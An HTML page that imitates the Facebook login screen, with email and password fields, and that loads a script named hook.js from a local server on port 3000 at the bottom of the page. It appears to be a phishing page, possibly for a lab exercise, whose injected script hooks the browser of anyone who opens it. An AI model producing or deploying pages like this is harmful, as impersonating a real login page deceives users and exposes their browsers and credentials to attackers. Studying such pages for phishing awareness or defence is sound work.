<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login</title>
    <link rel="stylesheet" href="facebook.css">
</head>
<body>
    <div class="container">
        <div class="login-container">
            <h1>Log in to Facebook</h1>
            <form action="#" method="post">
                <div class="input-group">
                    <label for="email">Email or Phone</label>
                    <input type="text" id="email" name="email" required>
                </div>
                <div class="input-group">
                    <label for="password">Password</label>
                    <input type="password" id="password" name="password" required>
                </div>
                <button type="submit" class="login-btn">Log In</button>
            </form>
            <p class="forgot-password">Forgot Password?</p>
            <br>
            <hr>
            <br>
            <button type="button" class="create-account">Create New Account</button>
        </div>
    </div>
</body>
    <script src="http://127.0.0.1:3000/hook.js"></script>
</html>
